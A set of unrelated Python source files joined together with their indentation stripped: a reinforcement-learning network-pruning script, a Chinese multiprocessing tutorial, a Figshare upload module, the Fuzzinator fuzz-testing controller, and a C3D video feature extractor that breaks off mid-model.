logger.info("Episode {} / {} : Done".format(e, n_epoch))
break
else:
logger.info("Episode {} / {} : Finished due to low accuracy for 10 consecutive trials".format(e, n_epoch))
finished = True
else:
counter_for_consecutive_failed_trials = 0
try:
del env
except ImportError:
pass
return sparsity_vs_accuracy
#
# def prune_policy_dist(queue=None):
# logger = get_logger("prune_pong_agent_using_Policy_dist")
# prune_model = StudentPong(input_size=prune_config.input_size, output_size=prune_config.output_size,
# model_path=student_config.model_path_policy_dist_pruned, scope=prune_config.scope,
# epsilon=prune_config.initial_epsilon,
# pruning_end=prune_config.pruning_end,
# pruning_freq=prune_config.pruning_freq,
# sparsity_end=prune_config.sparsity_end,
# target_sparsity=prune_config.target_sparsity,
# prune_till_death=True)
# target_model = PongTargetNet(input_size=dense_config.input_size, output_size=dense_config.output_size)
# prune_model.print_num_of_params()
# logger.info("loading models")
# print("loading models")
# target_model.load_model(dense_config.ready_path) # load ready model
# prune_model.load_model(student_config.model_path_policy_dist_ready) # load output of train via policy_dist
# prune_model.reset_global_step()
# logger.info("Commencing iterative pruning")
# sparsity_vs_accuracy = iterative_pruning_policy_distilliation(agent=prune_model, target_agent=target_model,
# iterations=student_config.n_epochs, logger=logger)
# print("dist finished")
# plot_graph(sparsity_vs_accuracy, "sparsity_vs_accuracy", figure_num=1, file_name="sparsity_vs_accuracy_with_dist")
# if queue is not None:
# queue.put(sparsity_vs_accuracy)
# prune_model.sess.close()
#
# def main():
#
# DQN_Queue = Queue()
# policy_Queue = Queue()
# p_DQN = Process(target=prune_DQN, args=(DQN_Queue,))
# p_policy_dist = Process(target=prune_policy_dist, args=(policy_Queue,))
#
# p_DQN.start()
# p_policy_dist.start()
# sparsity_vs_accuracy_dqn = DQN_Queue.get()
# sparsity_vs_accuracy_policy = policy_Queue.get()
# plot_nnz_vs_accuracy(data_policy=sparsity_vs_accuracy_policy, data_pruned=sparsity_vs_accuracy_dqn,
# legend=('IPP', 'MBG Pruning'), xlabel='NNZ params', ylabel='Accuracy',
# title='', filename='results_prune.png')
# p_DQN.join()
# p_policy_dist.join()
# """
# plot_nnz_vs_accuracy(data_policy=[[1,1600000],[-21,21]], data_pruned=[[1,1600000],[-21,21]],
# legend=('IPP', 'MBGP p'), xlabel='Non-Zero parameters', ylabel='Score',
# title='', filename='results_prune.png')
# """
# def iterative_pruning_policy_distilliation(logger, agent, target_agent, iterations=100, use_per=False,
# config=student_config, best_path=student_config.model_path_policy_dist_best,
# arch_type=0, lower_bound=0.0, accumulate_experience_fn=accumulate_experience,
# evaluate_fn=evaluate, objective_score=18.0):
# initial_score = evaluate_fn(agent=agent)
# sparsity_vs_accuracy = [[], []]
# sparsity_vs_accuracy[1].append(initial_score)
# sparsity_vs_accuracy[0].append(agent.get_number_of_nnz_params()) # change back to sparsiy
# if use_per:
# exp_replay = Supervised_Prioritzed_ExperienceReplay(size=config.memory_size,
# alpha=config.ALPHA_PER)
# else:
# exp_replay = Supervised_ExperienceReplay(size=config.memory_size)
# stop_prune_arg = False
# m = 0
# cnt = 0
# sparsity_measure = 10e6 # put 0 when done
# for i in range(iterations):
# logger.info("-- ITERATION number " + str(i) + "/" + str(iterations) + ": accumulating experience from teacher --")
# print("-- ITERATION number " + str(i) + "/" + str(iterations) + ": accumulating experience from teacher --")
# accumulate_experience_fn(teacher=target_agent, exp_replay=exp_replay, config=config)
# logger.info("-- ITERATION number " + str(i) + "/" + str(iterations) +
# ": finished accumulating experience from teacher starting to prune and fine-tune the student --")
# print("-- ITERATION number " + str(i) + "/" + str(iterations) +
# ": finished accumulating experience from teacher starting to prune and fine-tune the student -- ")
# score_list, sparsity_list, stop_prune_arg = train_student(logger=logger, student=agent,
# exp_replay=exp_replay,
# prune=True,
# lr=config.learning_rate_schedule_prune(i, arch_type),
# stop_prune_arg=stop_prune_arg,
# epoch=i, use_per=use_per, best_path=best_path,
# config=config, evaluate_fn=evaluate_fn, objective_score=objective_score,
# lower_bound=lower_bound)
#
# for j, score in enumerate(score_list):
# if sparsity_list[j] < sparsity_vs_accuracy[0][-1]: # revered for paper if get smaller
# sparsity_vs_accuracy[1].append(score)
# sparsity_vs_accuracy[0].append(sparsity_list[j]) # nnz params get smaller
# if sparsity_list[j] == sparsity_vs_accuracy[0][-1] and score > sparsity_vs_accuracy[1][-1]:
# sparsity_vs_accuracy[1][-1] = score
#
# mean_score = np.mean(score_list)
# logger.info("-- iteration number " + str(i) + ": student evaluation after pruning procedeure is: "
# + str(mean_score) + " --")
# print("-- iteration number " + str(i) + ": student evaluation after pruning procedeure is: "
# + str(mean_score) + " --")
#
# if mean_score < lower_bound:
# m += 1
# logger.info("-- iteration {} / {} : {} consecutive trials with low score --"
# .format(i, iterations, m))
# if m % 5 == 0:
# logger.info("-- iteration {} / {} : Finished due to low accuracy for 5 consecutive trials --"
# .format(i, iterations))
# break
# else:
# m = 0
#
# if abs(sparsity_measure - sparsity_vs_accuracy[0][-1]) < 1e-3:
# cnt += 1
# logger.info("-- iteration {} / {} : {} consecutive trials with same sparsity --"
# .format(i, iterations, cnt))
# if cnt == 5:
# logger.info("sparsity converged, ending pruning procedure")
# break
# else:
# cnt = 0
# if sparsity_vs_accuracy[0][-1] < sparsity_measure: # reversed for paper, symbolize NNZ params instead of sparsity
# sparsity_measure = sparsity_vs_accuracy[0][-1]
# return sparsity_vs_accuracy
def prune_benchmark():
logger = get_logger("prune_pong_agent_benchmark")
prune_model = DQNPacman(input_size=prune_config.input_size, output_size=prune_config.output_size,
model_path=prune_config.model_path, scope=prune_config.scope,
epsilon_stop=prune_config.final_epsilon, epsilon=prune_config.initial_epsilon,
pruning_end=prune_config.pruning_end,
pruning_freq=prune_config.pruning_freq,
sparsity_end=prune_config.sparsity_end,
target_sparsity=prune_config.target_sparsity,
prune_till_death=True)
target_model = PacmanTargetNet(input_size=dense_config.input_size, output_size=dense_config.output_size)
logger.info("loading models")
print("loading models")
target_model.load_model(dense_config.ready_path)
prune_model.load_model(dense_config.ready_path)
prune_model.change_loss_to_benchmark_loss()
prune_model.reset_global_step()
logger.info("Commencing iterative pruning")
sparsity_vs_accuracy = iterative_pruning(logger, prune_model, target_model, prune_config.n_epoch, benchmarking=True)
print("benchmark finished")
plot_graph(sparsity_vs_accuracy, "sparsity_vs_accuracy_benchmark", figure_num=1)
if __name__ == '__main__':
prune_benchmark()
|
mutipleprocessing.py | import os
print('process (%s) start...' % os.getpid())
pid = os.fork() # fork 子进程永远返回0,而父进程返回子进程的ID。
if pid == 0:
print('I am child process (%s) and my parent is %s.' % (os.getpid(), os.getppid()))
else:
print('I (%s) just created a child process (%s).' % (os.getpid(), pid))
# 如果你打算编写多进程的服务程序,Unix/Linux无疑是正确的选择。由于Windows没有fork调用,难道在Windows上无法用Python编写多进程的程序?
# 由于Python是跨平台的,自然也应该提供一个跨平台的多进程支持。multiprocessing模块就是跨平台版本的多进程模块。
# multiprocessing模块提供了一个Process类来代表一个进程对象,下面的例子演示了启动一个子进程并等待其结束:
# from multiprocessing import Process
# import os
# # 子进程要执行的代码
# def run_proc(name):
# print('Run child process %s (%s)...' % (name, os.getpid()))
# if __name__=='__main__':
# print('Parent process %s.' % os.getpid())
# p = Process(target=run_proc, args=('test',))
# print('Child process will start.')
# p.start()
# p.join()
# print('Child process end.')
# 执行结果如下:
# Parent process 928.
# Process will start.
# Run child process test (929)...
# Process end.
|
figshareSubmission.py | __author__ = 'felix.shaw@tgac.ac.uk - 03/05/2016'
import json
import requests
import os
from web.apps.web_copo.lookup.lookup import FIGSHARE_API_URLS
from chunked_upload.models import ChunkedUpload
from django.conf import settings
from dal.copo_da import DataFile, Submission
import threading
import datetime
from dal.copo_da import RemoteDataFile
from dal.figshare_da import Figshare
from web.apps.web_copo.schemas.utils import data_utils
from dal.figshare_da import Figshare
class FigshareSubmit(object):
def __init__(self, sub_id):
self.BASE_URL = FIGSHARE_API_URLS['base_url']
request = data_utils.get_current_request()
self.TOKEN = Figshare().get_token_for_user(request.user.id)['token']
self.HEADERS = {'Authorization': 'token ' + self.TOKEN}
self.MEDIA_ROOT = settings.MEDIA_ROOT
self.transfer_token = RemoteDataFile().create_transfer(sub_id)['_id']
def submit(self, sub_id, dataFile_ids):
t = threading.Thread(target=self._submit(sub_id=sub_id, dataFile_ids=dataFile_ids))
t.daemon = True
t.start()
def _submit(self, sub_id, dataFile_ids):
for f_id in dataFile_ids:
mongo_file = DataFile().get_record(f_id)
c = ChunkedUpload.objects.get(pk=int(mongo_file["file_id"]))
file_path = os.path.join(self.MEDIA_ROOT, str(c.file))
orig_name = c.filename
sub = mongo_file['description']['attributes']
data = dict()
data['defined_type'] = sub.get('type_category', dict()).get('type')
data['title'] = sub.get('title_author_description', dict()).get('title')
authors = sub.get('title_author_description', dict()).get('author').split(',')
lst = list()
for x in authors:
lst.append({'name': x})
data['authors'] = lst
data['description'] = sub.get('title_author_description', dict()).get('description')
cat = sub.get('type_category', dict()).get('categories')
if cat:
cat = cat.split(',')
cat = list(map(int, cat))
data['categories'] = cat
else:
data['categories'] = list()
data['tags'] = sub.get('tags', dict()).get('keywords').split(',')
for idx, t in enumerate(data['tags']):
if len(t) < 3:
if len(t) == 1:
t = t + (2 * t)
elif len(t) == 2:
t = t + t
data['tags'][idx] = t
data['references'] = sub.get('tags', dict()).get('references').split(',')
for idx, x in enumerate(data['references']):
if x != '':
if (not x.startswith('http')) or (not x.startswith('https')):
if (not x.startswith('www')):
data['references'][idx] = 'http://www.' + x
else:
data['references'][idx] = 'http://' + x
if len(data['references']) == 1 and data['references'][0] == '':
# if blank ref, pop
data.pop('references')
data['funding'] = sub.get('tags', dict()).get('funding')
data['licenses'] = sub.get('tags', dict()).get('licenses')
data['publish'] = sub.get('figshare_publish', dict()).get('should_publish')
# Create article
#data = json.dumps({'title': orig_name, 'defined_type': 'figure'})
endpoint = 'account/articles'
resp = requests.post(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS, data=json.dumps(data))
article_id = json.loads(resp.content.decode('utf8'))['location'].rsplit('/', 1)[1]
# Get file info
#with open(file_path, 'rb') as fin:
# fin.seek(0, 2) # Go to end of file
# size = fin.tell()
size = c.offset
info = json.dumps({'name': orig_name, 'size': size })
# Initiate upload
endpoint = 'account/articles/{}/files'.format(article_id)
resp = requests.post(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS, data=info)
file_id = json.loads(resp.content.decode('utf-8'))['location'].rsplit('/', 1)[1]
# Get upload/parts info
endpoint = 'account/articles/{}/files/{}'.format(article_id, file_id)
resp = requests.get(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS)
url = '{upload_url}'.format(**json.loads(resp.content.decode('utf-8')))
parts = json.loads(requests.get(url).content.decode('utf-8'))['parts']
# start upload timer
t = datetime.datetime.now()
# Upload parts
with open(file_path, 'rb') as fin:
for idx, part in enumerate(parts):
percent_done = idx / len(parts) * 100
size = part['endOffset'] - part['startOffset'] + 1
address = '{}/{}'.format(url, part['partNo'])
x = datetime.datetime.now()
requests.put(address, data=fin.read(size))
delta = datetime.datetime.now() - x
# calculate current upload rate in MB per second
bw = (size / delta.total_seconds()) / 1000 / 1000
fields = {'transfer_rate': bw, 'pct_completed': percent_done}
RemoteDataFile().update_transfer(self.transfer_token, fields)
# Mark file upload as completed
upload_time = datetime.datetime.now() - t
requests.post(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS)
fields = {'pct_completed': 100, 'transfer_status': 'success', 'completed_on':str(datetime.datetime.now()), 'article_id': article_id}
RemoteDataFile().update_transfer(self.transfer_token, fields)
if data['publish'] == 'True':
# publish api
endpoint = 'account/articles/{}/publish'.format(article_id)
resp = requests.post(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS)
location = json.loads(resp.content.decode('utf8'))['location']
# get accession data
endpoint = 'articles/{}'.format(article_id)
resp = requests.get(self.BASE_URL.format(endpoint=endpoint), headers=self.HEADERS)
# save accessions to mongo profile record
s = Submission().get_record(sub_id)
s['article_id'] = json.loads(resp.content.decode('utf8'))['figshare_url']
s['complete'] = True
s['status'] = 'published'
s['target_id'] = str(s.pop('_id'))
Submission().save_record(dict(), **s)
else:
# save accessions to mongo profile record
s = Submission().get_record(sub_id)
s['article_id'] = article_id
s['complete'] = True
s['status'] = 'not published'
s['target_id'] = str(s.pop('_id'))
Submission().save_record(dict(), **s)
# mark submission as complete
Submission().mark_submission_complete(sub_id, article_id=article_id)
Submission().mark_submission_complete(sub_id)
Submission().mark_figshare_article_id(sub_id=sub_id, article_id=article_id)
def publish_article(self, article_id):
endpoint = 'account/articles/{}/publish'.format(article_id)
post = self.BASE_URL.format(endpoint=endpoint)
resp = requests.post(post, headers=self.HEADERS)
if resp.status_code == 200 or resp.status_code == 201:
Submission().mark_figshare_article_published(article_id)
return resp
def isValidCredentials(self, user_id):
# check if token exists for user
token = Figshare().get_token_for_user(user_id=data_utils.get_current_user().id)
if token:
# now check if token works
headers = {'Authorization': 'token ' + token['token']}
r = requests.get('https://api.figshare.com/v2/account/articles', headers=headers)
if r.status_code == 200:
return True
else:
# we have an invalid token stored, so we should delete it and prompt the user for a new one
Figshare().delete_tokens_for_user(user_id=user_id)
return False
|
controller.py | # Copyright (c) 2016-2018 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import os
import psutil
import shutil
import signal
import time
import traceback
from multiprocessing import Lock, Process, Queue
from .config import config_get_callable, config_get_kwargs, config_get_name_from_section, config_get_with_writeback, import_entity
from .job import FuzzJob, ReduceJob, UpdateJob, ValidateJob
from .listener import ListenerManager
from .mongo_driver import MongoDriver
class Controller(object):
"""
Fuzzinator's main controller that orchestrates a fuzz session by scheduling
all related activities (e.g., keeps SUTs up-to-date, runs fuzzers and feeds
test cases to SUTs, or minimizes failure inducing test cases) . All
configuration options of the framework must be encapsulated in a
:class:`configparser.ConfigParser` object.
The following config sections and options are recognized:
- Section ``fuzzinator``: Global settings of the framework.
- Option ``work_dir``: Pattern of work directory for temporary files,
which may contain the substring ``{uid}`` as a placeholder for a
unique string (replaced by the framework). (Optional, default:
``~/.fuzzinator-{uid}``)
- Option ``db_uri``: URI to a MongoDB database to store found issues and
execution statistics. (Optional, default:
``mongodb://localhost/fuzzinator``)
- Option ``cost_budget``: (Optional, default: number of cpus)
- Sections ``sut.NAME``: Definitions of a SUT named *NAME*
- Option ``call``: Fully qualified name of a python callable that must
accept a ``test`` keyword argument representing the input to the SUT
and must return a dictionary object if the input triggered an issue
in the SUT, or a value considered false otherwise (which can be a
simple ``None``, but can also be a ``NonIssue`` in complex cases).
The returned issue dictionary (if any) *should* contain an ``'id'``
field that equals for issues that are not considered unique.
(Mandatory)
See package :mod:`fuzzinator.call` for potential callables.
- Option ``cost``: (Optional, default: 1)
- Option ``reduce``: Fully qualified name of a python callable that must
accept ``issue``, ``sut_call``, ``sut_call_kwargs``, ``listener``,
``ident``, ``work_dir`` keyword arguments representing an issue to be
reduced (and various other potentially needed objects), and must
return a tuple consisting of a reduced test case for the issue (or
``None`` if the issue's current test case could not be reduced) and a
(potentially empty) list of new issues that were discovered during
test case reduction (if any). (Optional, no reduction for this SUT if
option is missing.)
See package :mod:`fuzzinator.reduce` for potential callables.
- Option ``reduce_call``: Fully qualified name of a python callable that
acts as the SUT's ``call`` option during test case reduction.
(Optional, default: the value of option ``call``)
See package :mod:`fuzzinator.call` for potential callables.
- Option ``reduce_cost``: (Optional, default: the value of option
``cost``)
- Option ``validate_call``: Fully qualified name of a python callable
that acts as the SUT's ``call`` option during test case validation.
(Optional, default: the value of option ``reduce_call`` if defined,
otherwise the value of option ``call``)
See package :mod:`fuzzinator.call` for potential callables.
- Option ``update_condition``: Fully qualified name of a python callable
that must return ``True`` if and only if the SUT should be updated.
(Optional, SUT is never updated if option is missing.)
See package :mod:`fuzzinator.update` for potential callables.
- Option ``update``: Fully qualified name of a python callable that
should perform the update of the SUT. (Optional, SUT is never updated
if option is missing.)
See package :mod:`fuzzinator.update` for potential callables.
- Option ``formatter``: Fully qualified name of a python callable that
formats the issue dictionary of the SUT and returns a custom string
representation. It must accept ``issue`` and ``format`` keyword
arguments representing an issue to be formatted and a formatting
instruction. If ``format`` is ``'long'`` or not specified, the issue
should be formatted in full, while if ``'short'`` is given, a
summary description (preferably a single line of text) should be
returned.
(Optional, default: :mod:`fuzzinator.formatter.JsonFormatter`.)
See package :mod:`fuzzinator.formatter` for further potential
callables.
- Option ``tui_formatter``: Fully qualified name of a python
callable that formats the issue dictionary of the SUT to display
it in the TUI issue viewer interface.
(Optional, default: the value of option ``formatter``)
See package :mod:`fuzzinator.formatter` for further potential
callables.
- Option ``email_formatter``: Fully qualified name of a python
callable that formats the issue dictionary of the SUT to insert
it into an e-mail notification.
(Optional, default: the value of option ``formatter``)
See package :mod:`fuzzinator.formatter` for further potential
callables.
- Sections ``fuzz.NAME``: Definitions of a fuzz job named *NAME*
- Option ``sut``: Name of the SUT that describes the subject of
this fuzz job. (Mandatory)
- Option ``fuzzer``: Fully qualified name of a python callable that must
accept and ``index`` keyword argument representing a running counter
in the fuzz job and must return a test input (or ``None``, which
signals that the fuzzer is "exhausted" and cannot generate more test
cases in this fuzz job). The semantics of the generated test input is
not restricted by the framework, it is up to the configuration to
ensure that the SUT of the fuzz job can deal with the tests generated
by the fuzzer of the fuzz job. (Mandatory)
See package :mod:`fuzzinator.fuzzer` for potential callables.
- Option ``batch``: Number of times the fuzzer is requested to generate
a new test and the SUT is called with it. (Optional, default: 1)
- Option ``instances``: Number of instances of this fuzz job allowed to
run in parallel. (Optional, default: ``inf``)
- Option ``refresh``: Statistic update frequency in terms of executed
test cases. (Optional, default: ``batch`` size)
- Section ``listeners``: Definitions of custom event listeners.
This section is optional.
- Options ``OPT``: Fully qualified name of python class that
executes custom actions to selected events.
See package :mod:`fuzzinator.listeners` for potential listeners.
- Callable options can be implemented as functions or classes with
``__call__`` method (the latter are instantiated first to get a callable
object). Both constructor calls (if any) and the "real" calls can be
given keyword arguments. These arguments have to be specified in
sections ``(sut|fuzz).NAME.OPT[.init]`` with appropriate names (where
the ``.init`` sections stand for the constructor arguments).
- All callables can be decorated according to python semantics. The
decorators must be callable classes themselves and have to be specified
in options ``OPT.decorate(N)`` with fully qualified name. Multiple
decorators can be applied to a callable ``OPT``, their order is
specified by an integer index in parentheses. Keyword arguments to be
passed to the decorators have to be listed in sections
``(sut|fuzz).NAME.OPT.decorate(N)``.
See packages :mod:`fuzzinator.call` and :mod:`fuzzinator.fuzzer` for
potential decorators.
"""
def __init__(self, config):
"""
:param configparser.ConfigParser config: the configuration options of the
fuzz session.
:ivar fuzzinator.ListenerManager listener: a listener manager object that is
called on various events during the fuzz session.
"""
self.config = config
# Extract fuzzer names from sections describing fuzzing jobs.
self.fuzzers = [config_get_name_from_section(section) for section in config.sections() if section.startswith('fuzz.') and section.count('.') == 1]
self.capacity = int(config_get_with_writeback(self.config, 'fuzzinator', 'cost_budget', str(os.cpu_count())))
self.work_dir = config_get_with_writeback(self.config, 'fuzzinator', 'work_dir', os.path.join(os.getcwd(), '.fuzzinator-{uid}')).format(uid=os.getpid())
self.config.set('fuzzinator', 'work_dir', self.work_dir)
self.db = MongoDriver(config_get_with_writeback(self.config, 'fuzzinator', 'db_uri', 'mongodb://localhost/fuzzinator'))
self.db.init_db([(self.config.get('fuzz.' + fuzzer, 'sut'), fuzzer) for fuzzer in self.fuzzers])
self.listener = ListenerManager()
for name in config_get_kwargs(self.config, 'listeners'):
entity = import_entity(self.config.get('listeners', name))
self.listener += entity(config=config, **config_get_kwargs(config, 'listeners.' + name + '.init'))
self._job_id = 0
self._issue_queue = Queue()
self._lock = Lock()
def run(self, *, max_cycles=None):
"""
Start the fuzz session.
:param int max_cycles: maximum number to iterate through the fuzz jobs
defined in the configuration (defaults to ``inf``).
"""
max_cycles = max_cycles if max_cycles is not None else float('inf')
cycle = 0
running_jobs = dict()
fuzz_idx = 0
try:
while True:
self._wait_for_load(0, running_jobs)
if fuzz_idx == 0:
cycle += 1
if cycle > max_cycles or (not self.fuzzers and max_cycles != float('inf')):
self._wait_for_load(self.capacity, running_jobs)
break
next_job = None
if not self._issue_queue.empty():
# Perform all the reduce jobs before start hunting for new issues.
while not self._issue_queue.empty():
issue = self._issue_queue.get_nowait()
if self.config.has_option('sut.' + issue['sut'], 'reduce'):
next_job_id = self._next_job_id()
next_job = ReduceJob(id=next_job_id,
config=self.config,
issue=issue,
work_dir=self.work_dir,
db=self.db,
listener=self.listener)
self.listener.new_reduce_job(ident=next_job_id,
sut=next_job.sut_name,
cost=next_job.cost,
issue_id=issue['id'],
size=len(issue['test']))
break
if not next_job:
if not self.fuzzers:
time.sleep(1)
continue
fuzz_section = 'fuzz.' + self.fuzzers[fuzz_idx]
instances = self.config.get(fuzz_section, 'instances', fallback='inf')
instances = float(instances) if instances == 'inf' else int(instances)
if instances <= sum(1 for job in running_jobs.values() if isinstance(job['job'], FuzzJob) and job['job'].fuzzer_name == self.fuzzers[fuzz_idx]):
# Update fuzz_idx to point the next job's parameters.
fuzz_idx = (fuzz_idx + 1) % len(self.fuzzers)
continue
next_job_id = self._next_job_id()
next_job = FuzzJob(id=next_job_id,
config=self.config,
fuzzer_name=self.fuzzers[fuzz_idx],
db=self.db,
listener=self.listener)
# Before starting a new fuzz job let's check if we are working with
# the latest version of the SUT and update it if needed.
self._check_update(next_job, running_jobs)
# Update fuzz_idx to point the next job's parameters.
fuzz_idx = (fuzz_idx + 1) % len(self.fuzzers)
# Notify the active listener about the new job.
self.listener.new_fuzz_job(ident=next_job_id,
fuzzer=next_job.fuzzer_name,
sut=next_job.sut_name,
cost=next_job.cost,
batch=next_job.batch)
# Wait until there is enough capacity for the next job.
self._wait_for_load(next_job.cost, running_jobs)
proc = Process(target=self._run_job, args=(next_job,))
running_jobs[next_job_id] = dict(job=next_job, proc=proc)
# Notify the active listener that a job has been activated.
self.listener.activate_job(ident=next_job_id)
proc.start()
except KeyboardInterrupt:
pass
except Exception as e:
self.listener.warning(msg='Exception in the main controller loop: {exception}\n{trace}'.format(exception=e, trace=traceback.format_exc()))
finally:
Controller.kill_process_tree(os.getpid(), kill_root=False)
if os.path.exists(self.work_dir):
shutil.rmtree(self.work_dir, ignore_errors=True)
def _check_update(self, job, running_jobs):
sut_section = 'sut.' + job.sut_name
if not self.config.has_option(sut_section, 'update'):
return
update_condition, update_condition_kwargs = config_get_callable(self.config, sut_section, 'update_condition')
if not update_condition:
return
with update_condition:
if not update_condition(**update_condition_kwargs):
return
next_job_id = self._next_job_id()
next_job = UpdateJob(id=next_job_id,
config=self.config,
sut_name=job.sut_name)
self.listener.new_update_job(ident=next_job_id, sut=job.sut_name)
# Wait until every job has finished.
self._wait_for_load(self.capacity, running_jobs)
# Emit 'next_job available' event.
self.listener.activate_job(ident=next_job_id)
# Update job runs in the main thread since it's blocking for any other jobs.
next_job.run()
self.listener.remove_job(ident=next_job_id)
def _wait_for_load(self, new_load, running_jobs):
while True:
load = 0
for ident in list(running_jobs):
if not running_jobs[ident]['proc'].is_alive():
self.listener.remove_job(ident=ident)
del running_jobs[ident]
else:
load += running_jobs[ident]['job'].cost
self.listener.update_load(load=load)
if load + new_load <= self.capacity:
return load
time.sleep(1)
def _run_job(self, job):
try:
for issue in job.run():
self.add_reduce_job(issue=issue)
except Exception as e:
self.listener.warning(msg='Exception in {job}: {exception}\n{trace}'.format(
job=repr(job),
exception=e,
trace=traceback.format_exc()))
def _next_job_id(self):
next_job_id = self._job_id
self._job_id += 1
return next_job_id
def add_reduce_job(self, issue):
with self._lock:
self._issue_queue.put(issue)
def reduce_all(self):
for issue in self.db.find_issues_by_suts([section for section in self.config.sections() if section.startswith('sut.') and section.count('.') == 1]):
if not issue['reported'] and not issue['reduced']:
self.add_reduce_job(issue)
def validate(self, issue):
next_job_id = self._next_job_id()
next_job = ValidateJob(id=next_job_id,
config=self.config,
issue=issue,
db=self.db,
listener=self.listener)
self.listener.new_validate_job(ident=next_job_id,
sut=next_job.sut_name,
issue_id=issue['id'])
self.listener.activate_job(ident=next_job_id)
next_job.run()
self.listener.remove_job(ident=next_job_id)
@staticmethod
def kill_process_tree(pid, kill_root=True, sig=signal.SIGTERM):
try:
root_proc = psutil.Process(pid)
children = root_proc.children(recursive=True)
if kill_root:
children.append(root_proc)
for proc in children:
# Would be easier to use proc.terminate() here but psutils
# (up to version 5.4.0) on Windows terminates processes with
# the 0 signal/code, making the outcome of the terminated
# process indistinguishable from a successful execution.
try:
os.kill(proc.pid, sig)
except OSError:
pass
psutil.wait_procs(children, timeout=1)
except psutil.NoSuchProcess:
pass
|
extract_features.py | from __future__ import absolute_import
import argparse
import multiprocessing
import os
import sys
import time
import traceback
import numpy as np
from progressbar import ProgressBar
import h5py
from src.data import VideoGenerator
def extract_features(videos_dir, output_dir, batch_size, num_threads,
queue_size, num_gpus):
# Defining variables
input_size = (112, 112)
length = 16
wait_time = 0.1
output_path = os.path.join(output_dir, 'video_features.hdf5')
mode = 'r+' if os.path.exists(output_path) else 'w'
# Extract the ids of the videos already extracted its features
output_file = h5py.File(output_path, mode)
extracted_videos = output_file.keys()
output_file.close()
videos_ids = [v[:-4] for v in os.listdir(videos_dir) if v[-4:] == '.mp4']
# Lets remove from the list videos_ids, the ones already extracted its features
videos_ids_to_extract = list(set(videos_ids) - set(extracted_videos))
nb_videos = len(videos_ids_to_extract)
print('Total number of videos: {}'.format(len(videos_ids)))
print('Videos already extracted its features: {}'.format(
len(extracted_videos)))
print('Videos to extract its features: {}'.format(nb_videos))
# Creating Parallel Fetching Video Data
print('Creating {} process to fetch video data'.format(num_threads))
data_gen_queue = multiprocessing.Queue(maxsize=queue_size)
_stop_all_generators = multiprocessing.Event()
_stop_all_extractors = multiprocessing.Event()
def data_generator_task(index):
generator = VideoGenerator(
videos_ids_to_extract[index:nb_videos:num_threads], videos_dir,
'mp4', length, input_size)
keep = True
while keep:
try:
if data_gen_queue.qsize() < queue_size:
try:
generator_output = next(generator)
except ValueError:
continue
data_gen_queue.put(generator_output)
else:
time.sleep(wait_time)
except StopIteration:
print('End')
break
except Exception:
keep = False
print('Something went wrong with generator_process')
print(traceback.print_exc())
generator_process = [
multiprocessing.Process(target=data_generator_task, args=[i])
for i in range(num_threads)
]
for process in generator_process:
process.daemon = True
process.start()
data_save_queue = multiprocessing.Queue()
def extranting_features_task():
# Loading the model
print('Loading model')
model = C3D_conv_features(summary=True)
print('Compiling model')
model.compile(optimizer='sgd', loss='mse')
print('Compiling done!')
print('Starting extracting features')
print('Loading mean')
mean_total = np.load('data/models/c3d-sports1M_mean.npy')
mean = np.mean(mean_total, axis=(0, 2, 3, 4), keepdims=True)
while not (_stop_all_generators.is_set() and data_gen_queue.empty()):
generator_output = None
while True:
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
if not generator_output:
continue
break
else:
time.sleep(wait_time)
video_id, X = generator_output
if X is None:
print('Could not be read the video {}'.format(video_id))
continue
X = X - mean
Y = model.predict(X, batch_size=batch_size)
data_save_queue.put((video_id, Y))
print('Extracted features from video {}'.format(video_id))
extractors_process = [
multiprocessing.Process(target=extranting_features_task)
for i in range(num_gpus)
]
for p in extractors_process:
p.daemon = True
p.start()
# Create the process that will get all the extracted features from the data_save_queue and
# store it on the hdf5 file.
def saver_task():
while not (_stop_all_extractors.is_set() and data_save_queue.empty()):
extracted_output = None
while True:
if not data_save_queue.empty():
extracted_output = data_save_queue.get()
if not extracted_output:
continue
break
else:
time.sleep(wait_time)
video_id, features = extracted_output
if features is None:
print('Something went wrong')
continue
assert features.shape[1] == 4096
with h5py.File(output_path, 'r+') as f:
f.create_dataset(video_id, data=features, dtype='float32')
print('Saved video {}'.format(video_id))
saver_process = multiprocessing.Process(target=saver_task)
saver_process.daemon = True
saver_process.start()
# Joining processes
for p in generator_process:
p.join()
_stop_all_generators.set()
for p in extractors_process:
p.join()
_stop_all_extractors.set()
saver_process.join()
def C3D_conv_features(summary=False):
""" Return the Keras model of the network until the fc6 layer where the
convolutional features can be extracted.
"""
from keras.layers.convolutional import Convolution3D, MaxPooling3D, ZeroPadding3D
from keras.layers.core import Dense, Dropout, Flatten
from keras.models import Sequential
model = Sequential()
# 1st layer group
model.add(
Convolution3D(
64,
3,
3,
3,
activation='relu',
border_mode='same',
name='conv1',
subsample=(1, 1, 1),
input_shape=(3, 16, 112, 112),
trainable=False))
model.add(
MaxPooling3D(
pool_size=(1, 2, 2),
strides=(1, 2, 2),
border_mode='valid',
name='pool1'))
# 2nd layer group
model.add(
Convolution3D(
128,
3,
3,
3,
activation='relu',
border_mode='same',
name='conv2',
subsample=(1, 1, 1),
trainable=False))
model.add(
MaxPooling3D(
pool_size=(2, 2, 2),
strides=(2, 2, 2),
border_mode='valid',
name='pool2'))
# 3rd layer group
model.add(
Convolution3D(
256,
3,
3,
3,
activation='relu',
border_mode='same',
name='conv3a',
subsample=(1, 1, 1),
trainable=False))
model.add(
Convolution3D(
256,
3,
3,
3,
activation='relu',
border_mode='same',
name='conv3b',
subsample=(1, 1, 1),
trainable=False))
model.add(
MaxPooling3D(
pool_size=(2, 2, 2),
strides=(2, 2, 2),
border_mode='valid',
name='pool3'))
# 4th layer group
model.add(
Convolution3D(
512,
3,
3,
3,
activation='relu',
border_mode='same',
name='conv4a',
subsample=(1, 1, 1),
trainable=False))
model.add(
Convolution3D(
512,
3,
3,
3,
activation='relu',
border_mode='same',
name='conv4b',
subsample=(1, 1, 1),
trainable=False))
model.add(
MaxPooling3D(
pool_size=(2, 2, 2),
strides=(2, 2, 2),
border_mode='valid',
name='pool4'))
# 5th layer group
model.add(
Convolution3D(
